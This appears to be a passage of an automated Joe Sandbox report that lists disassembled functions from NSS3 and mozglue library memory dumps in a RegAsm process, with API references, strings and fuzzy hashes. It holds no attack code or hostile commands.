Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 4a8efa7548618e2fafb91485fcdb11edde9534a5f01c1779173ad92142c5163e
Instruction ID: e7e7ebdff0050503450ca6de33b31e7e7328ed237f1f35a762bf673bf280efe3
Opcode Fuzzy Hash: 4a8efa7548618e2fafb91485fcdb11edde9534a5f01c1779173ad92142c5163e
Instruction Fuzzy Hash: 5B218DB5A54601CFCF00EF78C98466ABBF0FF45318F55896AD88887711EB34D852CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE50ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CE50EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CE50EFA

Part of subcall function 6CD3AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CD3AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CE50ED9, 6CE50EE5, 6CE50F06, 6CE50F0B
Aborting, xrefs: 6CE50EB3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 308b53c363b9ffa60ab6de8d5ed8e3fb6f188cb429733db9a469007238be8eeb
Instruction ID: 377dca6c89d0ba61e8bec291e967e3e68c186553dd22017efa6c8020e3c40cf1
Opcode Fuzzy Hash: 308b53c363b9ffa60ab6de8d5ed8e3fb6f188cb429733db9a469007238be8eeb
Instruction Fuzzy Hash: C10180B6A00114BBDF01AF64DC46CAB3F3DEF47368B544065FD0997711D636EA6086B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC09420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
__Init_thread_footer.LIBCMT ref: 6CC0949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC0946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC09459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC0947D

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: c030a86e20179a737615462dbc1c866e121c3dad4c2563022985e50438da7088
Instruction ID: 5deee6d15f109f8d23b5428e04a92d513807375bf289385ca99bb41bbf41a8b1
Opcode Fuzzy Hash: c030a86e20179a737615462dbc1c866e121c3dad4c2563022985e50438da7088
Instruction Fuzzy Hash: 0201A770B001018BD710BBEDD815B4A37B5AB0637DF05C537ED0A86F51FA32E86A895B

Uniqueness

Uniqueness Score: -1.00%

Function 6CE14D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CE14DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE14DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE14DCB
misuse, xrefs: 6CE14DD5
API call with %s database connection pointer, xrefs: 6CE14DBD
invalid, xrefs: 6CE14DB8
%s at line %d of [%.10s], xrefs: 6CE14DDA

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 2669ce8088261b51c6dfa643c8ea65c8222d6729dc106572a23325c832898237
Instruction ID: 22fad117b4e1394ac9da52ab733112b6a125332fa82606f9f5a0f87971f8e265
Opcode Fuzzy Hash: 2669ce8088261b51c6dfa643c8ea65c8222d6729dc106572a23325c832898237
Instruction Fuzzy Hash: 32F0E915E289646BDF504215CD11FC637B55F0231DF7609B2FD186BF52E20998A0C2E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE14DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CE14E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE14E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE14E38
misuse, xrefs: 6CE14E42
API call with %s database connection pointer, xrefs: 6CE14E2A
invalid, xrefs: 6CE14E25
%s at line %d of [%.10s], xrefs: 6CE14E47

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 6026e5717a29eea16748bc01e1eaa4e377c353ada50f8b3d84e28c5868fbc16c
Instruction ID: 1ec339552ffdc8f855a22ef3d421b8cb8ddf4360a3ad68451dc3363ad721b1f1
Opcode Fuzzy Hash: 6026e5717a29eea16748bc01e1eaa4e377c353ada50f8b3d84e28c5868fbc16c
Instruction Fuzzy Hash: F1F02E91F4C9182BEE200215DC10FC237B54B0171DF3944A2EA186FF92D30998B182F2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD80C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CD81444,?,00000001,?,00000000,00000000,?,?,6CD81444,?,?,00000000,?,?), ref: 6CD80CB3

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CD81444,?,00000001,?,00000000,00000000,?,?,6CD81444,?), ref: 6CD80DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CD81444,?,00000001,?,00000000,00000000,?,?,6CD81444,?), ref: 6CD80DEC

Part of subcall function 6CDA0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CD42AF5,?,?,?,?,?,6CD40A1B,00000000), ref: 6CDA0F1A
Part of subcall function 6CDA0F10: malloc.MOZGLUE(00000001), ref: 6CDA0F30
Part of subcall function 6CDA0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CDA0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CD81444,?,00000001,?,00000000,00000000,?), ref: 6CD80DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CD81444,?,00000001,?,00000000), ref: 6CD80E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CD81444,?,00000001,?,00000000,00000000,?), ref: 6CD80E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CD81444,?,00000001,?,00000000,00000000,?,?,6CD81444,?,?,00000000), ref: 6CD80E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CD81444,?,00000001,?,00000000,00000000,?), ref: 6CD80E79

Part of subcall function 6CD91560: TlsGetValue.KERNEL32(00000000,?,6CD60844,?), ref: 6CD9157A
Part of subcall function 6CD91560: EnterCriticalSection.KERNEL32(?,?,?,6CD60844,?), ref: 6CD9158F
Part of subcall function 6CD91560: PR_Unlock.NSS3(?,?,?,?,6CD60844,?), ref: 6CD915B2

Part of subcall function 6CD5B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CD61397,00000000,?,6CD5CF93,5B5F5EC0,00000000,?,6CD61397,?), ref: 6CD5B1CB
Part of subcall function 6CD5B1A0: free.MOZGLUE(5B5F5EC0,?,6CD5CF93,5B5F5EC0,00000000,?,6CD61397,?), ref: 6CD5B1D2

Part of subcall function 6CD589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CD588AE,-00000008), ref: 6CD58A04
Part of subcall function 6CD589E0: EnterCriticalSection.KERNEL32(?), ref: 6CD58A15
Part of subcall function 6CD589E0: memset.VCRUNTIME140(6CD588AE,00000000,00000132), ref: 6CD58A27
Part of subcall function 6CD589E0: PR_Unlock.NSS3(?), ref: 6CD58A35

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 792bc953a31699bd03ce312ac0c74095f9815ce1f280bd993d0656a20e2c00bd
Instruction ID: 81c692f041455d82a7f00f1815508876d6d06a30862f4e9300afc987bd68a8c1
Opcode Fuzzy Hash: 792bc953a31699bd03ce312ac0c74095f9815ce1f280bd993d0656a20e2c00bd
Instruction Fuzzy Hash: EC5196B6E022009FEB019F65DC81AAF37A8AF4525CF550064ED199BB22F731FD15C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD36E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CD36ED8
sqlite3_value_text.NSS3(?,?), ref: 6CD36EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CD36FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CD36FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CD36FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CD37010
sqlite3_value_blob.NSS3(?,?), ref: 6CD3701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CD37052

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 1a2003a03f715de2acb20e6bad81401d66890afd2e67b37fa6f8822cdd3ef084
Instruction ID: 2926e4c2798dab53fd1cb1c43590f28ea46fde498f4740fff2d0a94657d71fe2
Opcode Fuzzy Hash: 1a2003a03f715de2acb20e6bad81401d66890afd2e67b37fa6f8822cdd3ef084
Instruction Fuzzy Hash: EB61C3B1E14629DBDB00CB64CD007EEB7F2BF46308F285169D458AB760E7369C16CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CC10F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CC10F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC10F88
GetCurrentThreadId.KERNEL32 ref: 6CC10FF7
InitializeConditionVariable.KERNEL32(?), ref: 6CC11067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC110A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC1114B

Part of subcall function 6CC08AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC21563), ref: 6CC08BD5

free.MOZGLUE(?), ref: 6CC11174
free.MOZGLUE(?), ref: 6CC11186

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 3a4a97685aaa22e3a154c80593e3c29af4fb790779e62c8421b92ef5ce420faa
Instruction ID: d5635d89e5a7ec06f35ceb502ae91d770c3fff0dcf8932123bec0e40d135301f
Opcode Fuzzy Hash: 3a4a97685aaa22e3a154c80593e3c29af4fb790779e62c8421b92ef5ce420faa
Instruction Fuzzy Hash: CD61CF75A083409FDB10DF26C880BAAB7F5BFD5318F14891DE88987B11EB31E859DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CDA7313), ref: 6CDA8FBB

Part of subcall function 6CDA07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CD48298,?,?,?,6CD3FCE5,?), ref: 6CDA07BF
Part of subcall function 6CDA07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CDA07E6
Part of subcall function 6CDA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CDA081B
Part of subcall function 6CDA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CDA0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CDA7313), ref: 6CDA9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CDA7313), ref: 6CDA903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CDA7313), ref: 6CDA909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CDA7313), ref: 6CDA90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CDA7313), ref: 6CDA90F1

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CDA7313), ref: 6CDA906B

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CDA7313), ref: 6CDA9128

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 20717ea9c8220076ab21a8589855fe13309c17806fdfcb006e17876d99e78ae8
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: B4519375A00601CFEB10DFAADC84B26B3F5AF44358F154029E925D7B71EB32E806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB6AC

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CBCB61E), ref: 6CBCB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CBCB61E,?,?,?,?,?,00000000), ref: 6CBCB79A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 33934e093c138c3e658b7b7ca9e2302386d944d95cb190dd7089ad77e9be9e72
Instruction ID: 24df53575f7affc782a284721df9d09471c723074e80c9f175e0914dce284eb7
Opcode Fuzzy Hash: 33934e093c138c3e658b7b7ca9e2302386d944d95cb190dd7089ad77e9be9e72
Instruction Fuzzy Hash: E441A6B2E001559FCB04DF68DC409AFB7B5FB54324F25066AE825E7790E731A91487D2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6CC45104), ref: 6CBCEFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CBCEFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBCEFEC
free.MOZGLUE(?), ref: 6CBCF00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CBCF02E
memcpy.VCRUNTIME140(00000000,?), ref: 6CBCF041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBCF065
moz_xmalloc.MOZGLUE ref: 6CBCF072

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: fe3f5cf6376651ecbd0f1318c78abbf8b1a2762097d74225d433f0a7787194b9
Instruction ID: 5b7aaf063ec20862d13beccc819e24e7ab14a5ef06877f6dc3d2e0315a910c70
Opcode Fuzzy Hash: fe3f5cf6376651ecbd0f1318c78abbf8b1a2762097d74225d433f0a7787194b9
Instruction Fuzzy Hash: 4A41F4B1B002559FDB08CF68D8819AE7769EF84324B24426CE815DB794EB31E905C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD64E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CD64E90
EnterCriticalSection.KERNEL32 ref: 6CD64EA9
TlsGetValue.KERNEL32 ref: 6CD64EC6
EnterCriticalSection.KERNEL32 ref: 6CD64EDF
PL_HashTableLookup.NSS3 ref: 6CD64EF8
PR_Unlock.NSS3 ref: 6CD64F05
PR_Now.NSS3 ref: 6CD64F13
PR_Unlock.NSS3 ref: 6CD64F3A

Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307AD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307CD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307D6
